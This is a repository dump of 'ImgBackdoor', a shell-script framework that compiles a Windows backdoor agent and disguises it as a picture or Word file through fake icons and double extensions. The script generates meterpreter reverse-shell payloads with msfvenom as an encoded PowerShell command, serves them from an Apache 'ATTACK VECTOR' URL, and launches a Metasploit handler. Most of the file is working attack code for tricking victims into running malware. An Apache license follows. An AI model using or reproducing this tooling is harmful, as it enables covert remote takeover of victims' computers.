├── Cheese_Sat-07Dec19_17.19.png
├── ImgBackdoor.sh
├── LICENSE
├── README.md
├── banner
├── bin
├── FIE_logo.png
├── cleaner.rc
├── cleaner2.rc
├── evil.c
├── evil2.c
├── reshacker_setup.exe
└── word.docx
├── icons
├── JPEG-black.ico
├── JPEG-camera.ico
├── JPEG-orange.ico
├── JPEG-white.ico
├── JPG-Ios7.ico
├── JPG-black.ico
├── JPG-green.ico
├── JPG-white.ico
├── Microsoft-Excel.ico
├── Microsoft-Word.ico
├── PNG-black.ico
├── PNG-simple.ico
├── PNG-white.ico
├── Windows-Logo.ico
└── Windows-Store.ico
├── output
└── .set
├── pictures
├── Linux_Communism.png
├── about_communism.jpg
├── communist-windows.jpg
├── tux.jpeg
├── tux_communism.jpg
└── tuxguevara.png
└── settings
/Cheese_Sat-07Dec19_17.19.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Tsuyoken/ImgBackdoor/9ba0c1b9840076610a259f4295978c52a8189664/Cheese_Sat-07Dec19_17.19.png
--------------------------------------------------------------------------------
/ImgBackdoor.sh:
--------------------------------------------------------------------------------
1 | #!/bin/sh
2 | resize -s 22 92 > /dev/null
3 |
4 |
5 | Colors() {
6 | Escape="\033";
7 | white="${Escape}[0m";
8 | RedF="${Escape}[31m";
9 | GreenF="${Escape}[32m";
10 | YellowF="${Escape}[33m";
11 | BlueF="${Escape}[34m";
12 | CyanF="${Escape}[36m";
13 | Reset="${Escape}[0m";
14 | }
15 |
16 | VeR="1.0"
17 | ken="kennedy69"
18 | ArCh=`arch`
19 | IPATH=`pwd`
20 | HoME=`echo ~`
21 | CnA="Metamorphosis"
22 | DiStR0=`awk '{print $1}' /etc/issue`
23 | InT3R=`netstat -r | grep "default" | awk {'print $8'}`
24 | HkLm=`cat $HoME/.wine/system.reg | egrep -m 1 'ProductName' | cut -d '=' -f2 | cut -d '"' -f2` > /dev/null 2>&1 # wine windows version
25 |
26 |
27 | bYR=`cat $IPATH/settings | egrep -m 1 "BYPASS_RH" | cut -d '=' -f2` > /dev/null 2>&1
28 | EtU=`cat $IPATH/settings | egrep -m 1 "PICTURE_EXTENSION" | cut -d '=' -f2` > /dev/null 2>&1
29 | PaLe=`cat $IPATH/settings | egrep -m 1 "PAYLOAD_EXTENSION" | cut -d '=' -f2` > /dev/null 2>&1
30 | ApAc=`cat $IPATH/settings | egrep -m 1 "APACHE_WEBROOT" | cut -d '=' -f2` > /dev/null 2>&1
31 | NoMsF=`cat $IPATH/settings | egrep -m 1 "NON_MSF_PAYLOADS" | cut -d '=' -f2` > /dev/null 2>&1
32 | AuTo=`cat $IPATH/settings | egrep -m 1 "AUTO_PAYLOAD_BUILD" | cut -d '=' -f2` > /dev/null 2>&1
33 | AhPu=`cat $IPATH/settings | egrep -m 1 "AGENT_HANDLER_PORT" | cut -d '=' -f2` > /dev/null 2>&1
34 | FwDc=`cat $IPATH/settings | egrep -m 1 "FAKE_WORD_DOC" | cut -d '=' -f2` > /dev/null 2>&1
35 | PuIa=`cat $IPATH/settings | egrep -m 1 "USE_PUBLIC_IP" | cut -d '=' -f2` > /dev/null 2>&1
36 | PuiB=`cat $IPATH/settings | egrep -m 1 "EXTERNAL_IP" | cut -d '=' -f2` > /dev/null 2>&1
37 | ChEk=`cat $IPATH/settings | egrep -m 1 "MSF_REBUILD" | cut -d '=' -f2` > /dev/null 2>&1
38 |
39 | if [ "$ArCh" = "i386" ] || [ "$ArCh" = "i686" ]; then
40 | dEd="x86"
41 | arch="wine"
42 | PgFi="Program Files"
43 | ComP="i586-mingw32msvc-gcc"
44 | elif [ "$ArCh" = "x86_64" ] || [ "ArCh" = "amd64" ]; then
45 | dEd="x64"
46 | arch="wine64"
47 | PgFi="Program Files (x86)" # default value
48 | ComP="i686-w64-mingw32-gcc"
49 | else
50 | dEd="x86"
51 | arch="wine"
52 | PgFi="Program Files"
53 | ComP="i586-mingw32msvc-gcc"
54 | fi
55 | RhI="$HoME/.wine/drive_c/$PgFi/Resource Hacker/ResourceHacker.exe"
56 |
57 |
58 |
59 | case $DiStR0 in
60 | Kali) IP=`ifconfig $InT3R | egrep -w "inet" | awk '{print $2}'`;;
61 | Debian) IP=`ifconfig $InT3R | egrep -w "inet" | awk '{print $2}'`;;
62 | Mint) IP=`ifconfig $InT3R | egrep -w "inet" | awk '{print $2}' | cut -d ':' -f2`;;
63 | Ubuntu) IP=`ifconfig $InT3R | egrep -w "inet" | cut -d ':' -f2 | awk {'print $1'}`;;
64 | Parrot) IP=`ifconfig $InT3R | egrep -w "inet" | cut -d ':' -f2 | cut -d 'B' -f1`;;
65 | BackBox) IP=`ifconfig $InT3R | egrep -w "inet" | cut -d ':' -f2 | cut -d 'B' -f1`;;
66 | elementary) IP=`ifconfig $InT3R | egrep -w "inet" | cut -d ':' -f2 | cut -d 'B' -f1`;;
67 | *) IP=`zenity --title="Input your IP" --text "example: 192.168.0.1" --entry --width 300`;;
68 | esac
69 | clear
70 |
71 | if [ "$PuIa" = "YES" ]; then
72 | IP="$PuiB"
73 | fi
74 |
75 | Colors;
76 | echo ${BlueF}[☆]${white} Checking backend applications ..${Reset};
77 | sleep 1
78 | apc=`which $ComP`
79 | if [ "$?" != "0" ]; then
80 | FaIl="YES"
81 | echo ${RedF}[x]${white} mingw32[64] installation '->' not found!${Reset};
82 | sleep 1
83 | echo ${RedF}[x]${white} This script requires mingw32[64] to work${Reset};
84 | echo ${YellowF}[☆] Please wait: installing missing dependencies ..${Reset};
85 | if [ "$dEd" = "x86" ]; then
86 | echo ""
87 | sudo apt-get install mingw32
88 | echo ""
89 | else
90 | echo ""
91 | sudo dpkg --add-architecture i386 && apt-get update && apt-get -y dist-upgrade --allow-downgrades && apt-get install -y mingw32 i586-mingw32msvc-gcc mingw-w64 i686-w64-mingw32-gcc
92 | echo ""
93 | fi
94 | else
95 | echo ${BlueF}[✔️]${white}" mingw32 installation : ${GreenF}found!"${Reset};
96 | sleep 1
97 | fi
98 |
99 | apc=`which wine`
100 | if [ "$?" != "0" ]; then
101 | FaIl="YES"
102 | echo ${RedF}[x]${white} Wine installation '->' not found!${Reset};
103 | sleep 1
104 | echo ${RedF}[x]${white} This script requires wine to work${Reset};
105 | echo ${YellowF}[☆] Please wait: installing missing dependencies ..${Reset};
106 | echo ""
107 | sudo apt-get install wine
108 | echo ""
109 | else
110 | echo ${BlueF}[✔️]${white}" Wine installation : ${GreenF}found!"${Reset};
111 | sleep 1
112 | fi
113 |
114 | apc=`which xterm`
115 | if [ "$?" != "0" ]; then
116 | FaIl="YES"
117 | echo ${RedF}[x]${white} Xterm installation '->' not found!${Reset};
118 | sleep 1
119 | echo ${RedF}[x]${white} This script requires xterm to work!${Reset};
120 | echo ${YellowF}[☆] Please wait: installing missing dependencies ..${Reset};
121 | echo ""
122 | sudo apt-get install xterm
123 | echo ""
124 | else
125 | echo ${BlueF}[✔️]${white}" Xterm installation : ${GreenF}found!"${Reset};
126 | sleep 1
127 | fi
128 |
129 | apc=`which zenity`
130 | if [ "$?" != "0" ]; then
131 | FaIl="YES"
132 | echo ${RedF}[x]${white} Zenity installation '->' not found!${Reset};
133 | sleep 1
134 | echo ${RedF}[x]${white} This script requires Zenity to work!${Reset};
135 | echo ${YellowF}[☆] Please wait: installing missing dependencies ..${Reset};
136 | echo ""
137 | sudo apt-get install zenity
138 | echo ""
139 | else
140 | echo ${BlueF}[✔️]${white}" Zenity installation : ${GreenF}found!"${Reset};
141 | sleep 1
142 | fi
143 |
144 | if [ -e "$HoME/.wine/drive_c/$PgFi" ]; then
145 | echo ${BlueF}[☆]${white}" Wine $PgFi : ${GreenF}found!"${Reset};
146 | sleep 1
147 | else
148 | FaIl="YES"
149 | echo ${RedF}[x]${white} Wine: $PgFi '->' not found!${Reset};
150 | sleep 2
151 | echo ${GreenF}[☆]${white} Please wait, trying to build required folders ..!${Reset};
152 | winecfg > /dev/null 2>&1
153 | echo ""
154 | echo ${RedF}Listing drive_c directorys: ${Reset};
155 | ls $HoME/.wine/drive_c
156 | echo ""
157 | fi
158 |
159 |
160 | if [ "$FaIl" = "YES" ]; then
161 | sleep 3
162 | echo ${YellowF}[☆] ImgBackdoor needs to restart to finish installs ..${Reset};
163 | sleep 2
164 | exit
165 | fi
166 |
167 |
168 | if ! [ "$HkLm" = "Microsoft Windows 7" ]; then
169 | echo ${RedF}[x]${white} Wine system detected : ${RedF}$HkLm ${Reset};
170 | echo ${RedF}[x]${white} ImgBackdoor requires: ${GreenF}windows 7${white} version ..${Reset};
171 | echo ${YellowF}[☆] Starting winecfg, Please sellect required version ..${Reset};
172 | sleep 1
173 | winecfg > /dev/null 2>&1
174 | fi
175 |
176 |
177 | clear
178 | cat << !
179 |
180 | ▜▘ ▛▀▖ ▌ ▌
181 | ▐ ▛▚▀▖▞▀▌▙▄▘▝▀▖▞▀▖▌▗▘▞▀▌▞▀▖▞▀▖▙▀▖
182 | ▐ ▌▐ ▌▚▄▌▌ ▌▞▀▌▌ ▖▛▚ ▌ ▌▌ ▌▌ ▌▌
183 | ▀▘▘▝ ▘▗▄▘▀▀ ▝▀▘▝▀ ▘ ▘▝▀▘▝▀ ▝▀ ▘ $VeR
184 | Coded by: $ken
185 |
186 | Extension sellected: .$EtU (picture)
187 | Extension sellected: .$PaLe (payload)
188 | 'Edit setting file to select extention'
189 |
190 | !
191 | rUn=$(zenity --question --title="Image Backdoor" --text "Execute framework?" --width 270) > /dev/null 2>&1
192 | if [ "$PaLe" = "exe" ] && [ "$AuTo" = "YES" ]; then
193 | echo ${RedF}[x]${YellowF} "[settings] AUTO_PAYLOAD_BUILD=${RedF}$AuTo${YellowF} and PAYLOAD_EXTENSION=${RedF}$PaLe"${Reset};
194 | sleep 2
195 | echo ${RedF}[x]${YellowF} "Can ${RedF}NOT${YellowF} be used simultaneously, AUTO_PAYLOAD_BUILD does not build .exe binarys."${Reset};
196 | exit
197 | fi
198 |
199 | if [ "$?" -eq "0" ]; then
200 | service apache2 start | zenity --progress --pulsate --title "PLEASE WAIT" --text="Start apache2 webserver" --percentage=0 --auto-close --width 300 > /dev/null 2>&1
201 | if ! [ "$NoMsF" = "YES" ]; then
202 | service postgresql start | zenity --progress --pulsate --title "PLEASE WAIT" --text="Start Metasploit services" --percentage=0 --auto-close --width 300 > /dev/null 2>&1
203 | if [ "$ChEk" = "ON" ]; then
204 | service postgresql start
205 | echo ${BlueF}[☆]${white}" Checking msfdb connection status .."${Reset};
206 | ih=`msfconsole -q -x 'db_status; exit -y' | awk {'print $3'}`
207 | if [ "$ih" != "connected" ]; then
208 | echo ${RedF}[x]${white}" postgresql selected, no connection .."${Reset};
209 | echo ${BlueF}[☆]${white}" Please wait, rebuilding msf database .."${Reset};
210 | msfdb reinit | zenity --progress --pulsate --title "PLEASE WAIT" --text="Rebuild metasploit database" --percentage=0 --auto-close --width 300 > /dev/null 2>&1
211 | echo ${GreenF}[✔]${white}" postgresql connected to msf .."${Reset};
212 | sleep 2
213 | else
214 | echo ${GreenF}[✔]${white}" postgresql connected to msf .."${Reset};
215 | sleep 2
216 | fi
217 | fi
218 | fi
219 |
220 | else
221 |
222 | clear
223 | echo ""
224 | echo ${white} Codename${RedF}::${white}$CnA ${Reset};
225 | echo ${white} Maintener${RedF}::${white}$ken ${RedF}::${white}[Ferdi S Kennedy]${Reset};
226 | echo ""
227 | service apache2 stop | zenity --progress --pulsate --title "PLEASE WAIT" --text="Stop apache2 webserver" --percentage=0 --auto-close --width 300 > /dev/null 2>&1
228 | if ! [ "$NoMsF" = "YES" ]; then
229 | service postgresql stop | zenity --progress --pulsate --title "PLEASE WAIT" --text="Stop postgresql service" --percentage=0 --auto-close --width 300 > /dev/null 2>&1
230 | fi
231 | exit
232 | fi
233 |
234 |
235 | if [ "$AuTo" = "YES" ]; then
236 | paylo=$(zenity --list --title "AUTO-BUILD PAYLOAD" --text "\nChose payload to build:" --radiolist --column "Pick" --column "Option" TRUE "windows/meterpreter/reverse_tcp" FALSE "windows/meterpreter/reverse_tcp_dns" FALSE "windows/meterpreter/reverse_http" FALSE "windows/meterpreter/reverse_https" FALSE "windows/x64/meterpreter/reverse_tcp" FALSE "windows/x64/meterpreter/reverse_https" --width 350 --height 300) > /dev/null 2>&1
237 | xterm -T " ImgBackdoor - build payload: .$PaLe " -geometry 110x23 -e "sudo msfvenom -p $paylo LHOST=$IP LPORT=$AhPu -f psh-cmd -o $IPATH/output/chars.raw" > /dev/null 2>&1
238 | cd $IPATH/output
239 | str0=`cat chars.raw | awk {'print $12'}`
240 | echo "pOwErShElL -noP -wIN 1 -nOnI -eN Sh33L" > payload.raw
241 | sed "s|Sh33L|$str0|" payload.raw > payload.$PaLe
242 | rm payload.raw > /dev/null 2>&1
243 | rm chars.raw > /dev/null 2>&1
244 | cd $IPATH
245 | else
246 | UpL=$(zenity --title "PAYLOAD TO BE TRANSFORMED (only .$PaLe)" --filename=$IPATH --file-selection --text "chose payload to be transformed") > /dev/null 2>&1
247 | fi
248 | sleep 1
249 | JpG=$(zenity --title "IMAGE TO BE USED (only .$EtU)" --filename=$IPATH --file-selection --text "chose image to use.") > /dev/null 2>&1
250 | sleep 1
251 |
252 | if [ "$FwDc" = "YES" ]; then
253 | PaTh="$IPATH/icons/Microsoft-Word.ico"
254 | else
255 | if [ "$EtU" = "jpg" ]; then
256 | IcOn=$(zenity --list --title "ICON REPLACEMENT" --text "Chose one icon from the list." --radiolist --column "Pick" --column "Option" TRUE "JPG-black.ico" FALSE "JPG-white.ico" FALSE "JPG-green.ico" FALSE "Input your own icon" --width 330 --height 240) > /dev/null 2>&1
257 | elif [ "$EtU" = "jpeg" ]; then
258 | IcOn=$(zenity --list --title "ICON REPLACEMENT " --text "Chose one icon from the list." --radiolist --column "Pick" --column "Option" TRUE "JPEG-black.ico" FALSE "JPEG-white.ico" FALSE "JPEG-orange.ico" FALSE "Input your own icon" --width 330 --height 240) > /dev/null 2>&1
259 | elif [ "$EtU" = "png" ]; then
260 | IcOn=$(zenity --list --title "ICON REPLACEMENT" --text "Chose one icon from the list." --radiolist --column "Pick" --column "Option" TRUE "PNG-black.ico" FALSE "PNG-white.ico" FALSE "PNG-simple.ico" FALSE "Input your own icon" --width 330 --height 240) > /dev/null 2>&1
261 | else
262 | IcOn=$(zenity --list --title "ICON REPLACEMENT" --text "Chose one icon from the list." --radiolist --column "Pick" --column "Option" TRUE "JPG-Ios7.ico" FALSE "Microsoft-Word.ico" FALSE "Microsoft-Excel.ico" FALSE "Input your own icon" --width 330 --height 240) > /dev/null 2>&1
263 | fi
264 | if [ "$IcOn" = "Input your own icon" ]; then
265 | ImR=$(zenity --title "ICON REPLACEMENT" --filename=$IPATH --file-selection --text "chose icon.ico to use") > /dev/null 2>&1
266 | PaTh="$ImR"
267 | else
268 | PaTh="$IPATH/icons/$IcOn"
269 | fi
270 | fi
271 | sleep 1
272 | MiP=$(zenity --title "PAYLOAD FINAL NAME" --text "example: screenshot" --entry --width 300) > /dev/null 2>&1
273 | clear
274 | cat << !
275 |
276 | ▜▘ ▛▀▖ ▌ ▌
277 | ▐ ▛▚▀▖▞▀▌▙▄▘▝▀▖▞▀▖▌▗▘▞▀▌▞▀▖▞▀▖▙▀▖
278 | ▐ ▌▐ ▌▚▄▌▌ ▌▞▀▌▌ ▖▛▚ ▌ ▌▌ ▌▌ ▌▌
279 | ▀▘▘▝ ▘▗▄▘▀▀ ▝▀▘▝▀ ▘ ▘▝▀▘▝▀ ▝▀ ▘ $VeR
280 | Coded by: $ken
281 |
282 | !
283 | cd $IPATH/bin
284 | echo ${BlueF}[☆]${white} Building : evil agent ..${Reset};
285 | if [ "$PaLe" = "exe" ]; then
286 | sed "s|LhOsT|$IP|g" evil2.c > evilcopy.c
287 | sed -i "s|ScRee|$MiP.$EtU|g" evilcopy.c
288 | sed -i "s|EhLh|$PaLe|g" evilcopy.c
289 | sleep 2
290 | else
291 | sed "s|LhOsT|$IP|g" evil.c > evilcopy.c
292 | sed -i "s|ScRee|$MiP.$EtU|g" evilcopy.c
293 | sed -i "s|EhLh|$PaLe|g" evilcopy.c
294 | sleep 2
295 | fi
296 |
297 | echo ${BlueF}[☆]${white} Compiling: agent using mingw32 ..${Reset};
298 | sleep 2
299 | $ComP evilcopy.c -o trigger.exe -lws2_32 -mwindows
300 | mv trigger.exe $IPATH/output/trigger.exe > /dev/null 2>&1
301 | cd $IPATH
302 |
303 | if [ "$bYR" = "YES" ]; then
304 | echo ${YellowF}[☆]${white} Manually change icon.ico sellected ..${Reset};
305 | echo ${YellowF}[☆]${white} Use your favorite editor to change icon [trigger.exe]${Reset};
306 | echo ${YellowF}[☆] When finish, press any key to Continue ..${Reset};
307 | read op
308 | mv $IPATH/output/trigger.exe $IPATH/output/agent.exe > /dev/null 2>&1
309 |
310 | else
311 | if [ -f "$RhI" ]; then
312 | echo ${BlueF}[☆]${white} ResourceHacker.exe: found ..${Reset};
313 | sleep 1
314 | echo ${BlueF}[☆]${white} Working: In backdoor agent ..${Reset};
315 | $arch "$RhI" -open "$IPATH/output/trigger.exe" -save "$IPATH/output/agent.exe" -action addskip -res "$PaTh" -mask ICONGROUP,MAINICON,
316 | echo ${BlueF}[☆]${white} Change : backdoor agent icons ..${Reset};
317 | sleep 1
318 |
319 | else
320 | echo ${RedF}[x]${white} ResourceHacker.exe '->' not found!${Reset};
321 | sleep 1
322 | cat << !
323 |
324 | Installing ResourceHacker under .wine directorys ..
325 | Version:$HkLm Arch:$ArCh Folder:$PgFi
326 | PATH:$RhI
327 |
328 | !
329 | sleep 3
330 | xterm -T "ImgBackdoor" -geometry 90x26 -e "$arch $IPATH/bin/reshacker_setup.exe && sleep 3"
331 | echo ${YellowF}[☆] Please wait, restarting tool ..${Reset};
332 | echo ${YellowF}[☆] For proper ResourceHacker.exe Instalation!${Reset};
333 | sleep 2
334 | exit
335 |
336 | fi
337 | fi
338 |
339 |
340 | echo ${BlueF}[☆]${white} Change : backdoor agent extension ..${Reset};
341 | mv $IPATH/output/agent.exe $IPATH/output/$MiP.$EtU.exe > /dev/null 2>&1
342 | sleep 2
343 |
344 | echo ${BlueF}[☆]${white} Port: all files to apache2 webserver ..${Reset};
345 | if [ "$AuTo" = "YES" ]; then
346 | cp $IPATH/output/payload.$PaLe $ApAc/payload.$PaLe > /dev/null 2>&1
347 | else
348 | cp $UpL $ApAc/payload.$PaLe > /dev/null 2>&1
349 | fi
350 |
351 | cp $JpG $ApAc/$MiP.$EtU > /dev/null 2>&1
352 | sleep 2
353 | echo ${BlueF}[☆]${white} Creating: archive $MiP.zip ..${Reset};
354 | cd $IPATH/output
355 | if [ "$FwDc" = "YES" ]; then
356 | mv $MiP.$EtU.exe $MiP.docx.exe > /dev/null 2>&1
357 | zip $MiP.zip $MiP.docx.exe > /dev/null 2>&1
358 | mv $MiP.zip $ApAc/$MiP.zip > /dev/null 2>&1
359 | else
360 | zip $MiP.zip $MiP.$EtU.exe > /dev/null 2>&1
361 | mv $MiP.zip $ApAc/$MiP.zip > /dev/null 2>&1
362 | fi
363 | cd $IPATH
364 | sleep 2
365 |
366 | if [ "$NoMsF" = "YES" ]; then
367 | echo ${BlueF}[☆]${white} Metamorphosis: completed ..${Reset};
368 | sleep 2
369 | echo ${YellowF}[☆] Start your own handler now '(listener)' ..${Reset};
370 | sleep 2
371 | rm $IPATH/bin/evilcopy.c > /dev/null 2>&1
372 | rm $IPATH/output/trigger.exe > /dev/null 2>&1
373 | echo ""
374 | echo ${RedF}" ATTACK VECTOR: http://$IP/$MiP.zip"${Reset};
375 | echo ${RedF}" AGENT: $IPATH/output/$MiP.$EtU.exe"${Reset};
376 | echo ""
377 | sleep 1
378 | echo ${YellowF}[☆] When finish, press any key to Exit ImgBackdoor ..${Reset};
379 | read op
380 |
381 | else
382 |
383 | echo ${BlueF}[☆]${white} Creating: resource cleaner.rc ..${Reset};
384 | sleep 2
385 | cd $IPATH/bin
386 | if [ "$PaLe" = "exe" ]; then
387 | sed "s|RffR|$PaLe|g" cleaner2.rc > copy.rc
388 | sed -i "s|FaaF|$MiP|g" copy.rc
389 | sed -i "s|AssA|$EtU|g" copy.rc
390 | mv copy.rc $IPATH/output/cleaner.rc > /dev/null 2>&1
391 | cd $IPATH
392 | else
393 | sed "s|FaaF|$MiP|g" cleaner.rc > copy.rc
394 | sed -i "s|AssA|$EtU|g" copy.rc
395 | mv copy.rc $IPATH/output/cleaner.rc > /dev/null 2>&1
396 | cd $IPATH
397 | fi
398 | echo ${BlueF}[☆]${white} Metamorphosis: completed ..${Reset};
399 | rm $IPATH/output/trigger.exe > /dev/null 2>&1
400 | sleep 2
401 | if [ "$AuTo" = "YES" ]; then
402 | lhost="$IP"
403 | lport="$AhPu"
404 | else
405 | lhost=$(zenity --title="Enter binary.exe LHOST" --text "example: $IP" --entry --width 300) > /dev/null 2>&1
406 | lport=$(zenity --title="Enter binary.exe LPORT" --text "example: $AhPu" --entry --width 300) > /dev/null 2>&1
407 | paylo=$(zenity --list --title "ImgBackdoor" --text "\nChose payload used by binary.exe:" --radiolist --column "Pick" --column "Option" TRUE "windows/shell_bind_tcp" FALSE "windows/shell/reverse_tcp" FALSE "windows/meterpreter/reverse_tcp" FALSE "windows/meterpreter/reverse_tcp_dns" FALSE "windows/meterpreter/reverse_http" FALSE "windows/meterpreter/reverse_https" FALSE "windows/x64/meterpreter/reverse_tcp" FALSE "windows/x64/meterpreter/reverse_https" --width 350 --height 350) > /dev/null 2>&1
408 | fi
409 | echo ""
410 | echo ${RedF}" ATTACK VECTOR: http://$IP/$MiP.zip"${Reset};
411 | if [ "$FwDc" = "YES" ]; then
412 | echo ${RedF}" AGENT: $IPATH/output/$MiP.docx.exe"${Reset};
413 | else
414 | echo ${RedF}" AGENT: $IPATH/output/$MiP.$EtU.exe"${Reset};
415 | fi
416 | echo ${RedF}" CLEAN: meterpreter > resource $IPATH/output/cleaner.rc"${Reset};
417 | sleep 1
418 | xterm -T " PAYLOAD MULTI-HANDLER " -geometry 110x23 -e "sudo msfconsole -x 'use exploit/multi/handler; set LHOST $lhost; set LPORT $lport; set PAYLOAD $paylo; exploit'"
419 | fi
420 | rm $ApAc/$MiP.$EtU > /dev/null 2>&1
421 | rm $ApAc/$MiP.zip > /dev/null 2>&1
422 | rm $ApAc/payload.$PaLe > /dev/null 2>&1
423 | rm $ApAc/$MiP.$EtU.exe > /dev/null 2>&1
424 | rm $IPATH/bin/evilcopy.c > /dev/null 2>&1
425 | rm $IPATH/output/trigger.exe > /dev/null 2>&1
426 | sleep 2
427 | echo ""
428 | echo ${white} Codename${RedF}::${white}$CnA ${Reset};
429 | echo ${white} Author${RedF}::${white}$ken ${RedF}::${white}[Ferdi S Kennedy]${Reset};
430 | sleep 1
431 | service apache2 stop | zenity --progress --pulsate --title "PLEASE WAIT" --text="Stop apache2 webserver" --percentage=0 --auto-close --width 300 > /dev/null 2>&1
432 | if ! [ "$NoMsF" = "YES" ]; then
433 | service postgresql stop | zenity --progress --pulsate --title "PLEASE WAIT" --text="Stop postgresql service" --percentage=0 --auto-close --width 300 > /dev/null 2>&1
434 | fi
435 | exit
436 |
--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
1 | Apache License
2 | Version 2.0, January 2004
3 | http://www.apache.org/licenses/
4 |
5 | TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
6 |
7 | 1. Definitions.
8 |
9 | "License" shall mean the terms and conditions for use, reproduction,
10 | and distribution as defined by Sections 1 through 9 of this document.
11 |
12 | "Licensor" shall mean the copyright owner or entity authorized by
13 | the copyright owner that is granting the License.
14 |
15 | "Legal Entity" shall mean the union of the acting entity and all
16 | other entities that control, are controlled by, or are under common
17 | control with that entity. For the purposes of this definition,
18 | "control" means (i) the power, direct or indirect, to cause the
19 | direction or management of such entity, whether by contract or
20 | otherwise, or (ii) ownership of fifty percent (50%) or more of the
21 | outstanding shares, or (iii) beneficial ownership of such entity.
22 |
23 | "You" (or "Your") shall mean an individual or Legal Entity
24 | exercising permissions granted by this License.
25 |
26 | "Source" form shall mean the preferred form for making modifications,
27 | including but not limited to software source code, documentation
28 | source, and configuration files.
29 |
30 | "Object" form shall mean any form resulting from mechanical
31 | transformation or translation of a Source form, including but
32 | not limited to compiled object code, generated documentation,
33 | and conversions to other media types.
34 |
35 | "Work" shall mean the work of authorship, whether in Source or
36 | Object form, made available under the License, as indicated by a
37 | copyright notice that is included in or attached to the work
38 | (an example is provided in the Appendix below).
39 |
40 | "Derivative Works" shall mean any work, whether in Source or Object
41 | form, that is based on (or derived from) the Work and for which the
42 | editorial revisions, annotations, elaborations, or other modifications
43 | represent, as a whole, an original work of authorship. For the purposes
44 | of this License, Derivative Works shall not include works that remain
45 | separable from, or merely link (or bind by name) to the interfaces of,
46 | the Work and Derivative Works thereof.
47 |
48 | "Contribution" shall mean any work of authorship, including
49 | the original version of the Work and any modifications or additions
50 | to that Work or Derivative Works thereof, that is intentionally
51 | submitted to Licensor for inclusion in the Work by the copyright owner
52 | or by an individual or Legal Entity authorized to submit on behalf of
53 | the copyright owner. For the purposes of this definition, "submitted"
54 | means any form of electronic, verbal, or written communication sent
55 | to the Licensor or its representatives, including but not limited to
56 | communication on electronic mailing lists, source code control systems,
57 | and issue tracking systems that are managed by, or on behalf of, the
58 | Licensor for the purpose of discussing and improving the Work, but
59 | excluding communication that is conspicuously marked or otherwise
60 | designated in writing by the copyright owner as "Not a Contribution."
61 |
62 | "Contributor" shall mean Licensor and any individual or Legal Entity
63 | on behalf of whom a Contribution has been received by Licensor and
64 | subsequently incorporated within the Work.
65 |
66 | 2. Grant of Copyright License. Subject to the terms and conditions of
67 | this License, each Contributor hereby grants to You a perpetual,
68 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable
69 | copyright license to reproduce, prepare Derivative Works of,
70 | publicly display, publicly perform, sublicense, and distribute the
71 | Work and such Derivative Works in Source or Object form.
72 |
73 | 3. Grant of Patent License. Subject to the terms and conditions of
74 | this License, each Contributor hereby grants to You a perpetual,
75 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable
76 | (except as stated in this section) patent license to make, have made,
77 | use, offer to sell, sell, import, and otherwise transfer the Work,
78 | where such license applies only to those patent claims licensable
79 | by such Contributor that are necessarily infringed by their
80 | Contribution(s) alone or by combination of their Contribution(s)
81 | with the Work to which such Contribution(s) was submitted. If You
82 | institute patent litigation against any entity (including a
83 | cross-claim or counterclaim in a lawsuit) alleging that the Work
84 | or a Contribution incorporated within the Work constitutes direct
85 | or contributory patent infringement, then any patent licenses
86 | granted to You under this License for that Work shall terminate
87 | as of the date such litigation is filed.
88 |
89 | 4. Redistribution. You may reproduce and distribute copies of the
90 | Work or Derivative Works thereof in any medium, with or without
91 | modifications, and in Source or Object form, provided that You
92 | meet the following conditions:
93 |
94 | (a) You must give any other recipients of the Work or
95 | Derivative Works a copy of this License; and
96 |
97 | (b) You must cause any modified files to carry prominent notices
98 | stating that You changed the files; and
99 |
100 | (c) You must retain, in the Source form of any Derivative Works
101 | that You distribute, all copyright, patent, trademark, and
102 | attribution notices from the Source form of the Work,
103 | excluding those notices that do not pertain to any part of
104 | the Derivative Works; and
105 |
106 | (d) If the Work includes a "NOTICE" text file as part of its
107 | distribution, then any Derivative Works that You distribute must
108 | include a readable copy of the attribution notices contained
109 | within such NOTICE file, excluding those notices that do not
110 | pertain to any part of the Derivative Works, in at least one
111 | of the following places: within a NOTICE text file distributed
112 | as part of the Derivative Works; within the Source form or
113 | documentation, if provided along with the Derivative Works; or,
114 | within a display generated by the Derivative Works, if and
115 | wherever such third-party notices normally appear. The contents
116 | of the NOTICE file are for informational purposes only and
117 | do not modify the License. You may add Your own attribution
118 | notices within Derivative Works that You distribute, alongside
119 | or as an addendum to the NOTICE text from the Work, provided
120 | that such additional attribution notices cannot be construed
121 | as modifying the License.
122 |
123 | You may add Your own copyright statement to Your modifications and
124 | may provide additional or different license terms and conditions
125 | for use, reproduction, or distribution of Your modifications, or
126 | for any such Derivative Works as a whole, provided Your use,
127 | reproduction, and distribution of the Work otherwise complies with
128 | the conditions stated in this License.
129 |
130 | 5. Submission of Contributions. Unless You explicitly state otherwise,
131 | any Contribution intentionally submitted for inclusion in the Work
132 | by You to the Licensor shall be under the terms and conditions of
133 | this License, without any additional terms or conditions.
134 | Notwithstanding the above, nothing herein shall supersede or modify
135 | the terms of any separate license agreement you may have executed
136 | with Licensor regarding such Contributions.
137 |
138 | 6. Trademarks. This License does not grant permission to use the trade
139 | names, trademarks, service marks, or product names of the Licensor,
140 | except as required for reasonable and customary use in describing the
141 | origin of the Work and reproducing the content of the NOTICE file.
142 |
143 | 7. Disclaimer of Warranty. Unless required by applicable law or
144 | agreed to in writing, Licensor provides the Work (and each
145 | Contributor provides its Contributions) on an "AS IS" BASIS,
146 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
147 | implied, including, without limitation, any warranties or conditions
148 | of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A
149 | PARTICULAR PURPOSE. You are solely responsible for determining the
150 | appropriateness of using or redistributing the Work and assume any
151 | risks associated with Your exercise of permissions under this License.
152 |
153 | 8. Limitation of Liability. In no event and under no legal theory,
154 | whether in tort (including negligence), contract, or otherwise,
155 | unless required by applicable law (such as deliberate and grossly
156 | negligent acts) or agreed to in writing, shall any Contributor be
157 | liable to You for damages, including any direct, indirect, special,
158 | incidental, or consequential damages of any character arising as a
159 | result of this License or out of the use or inability to use the
160 | Work (including but not limited to damages for loss of goodwill,
161 | work stoppage, computer failure or malfunction, or any and all
162 | other commercial damages or losses), even if such Contributor
163 | has been advised of the possibility of such damages.
164 |
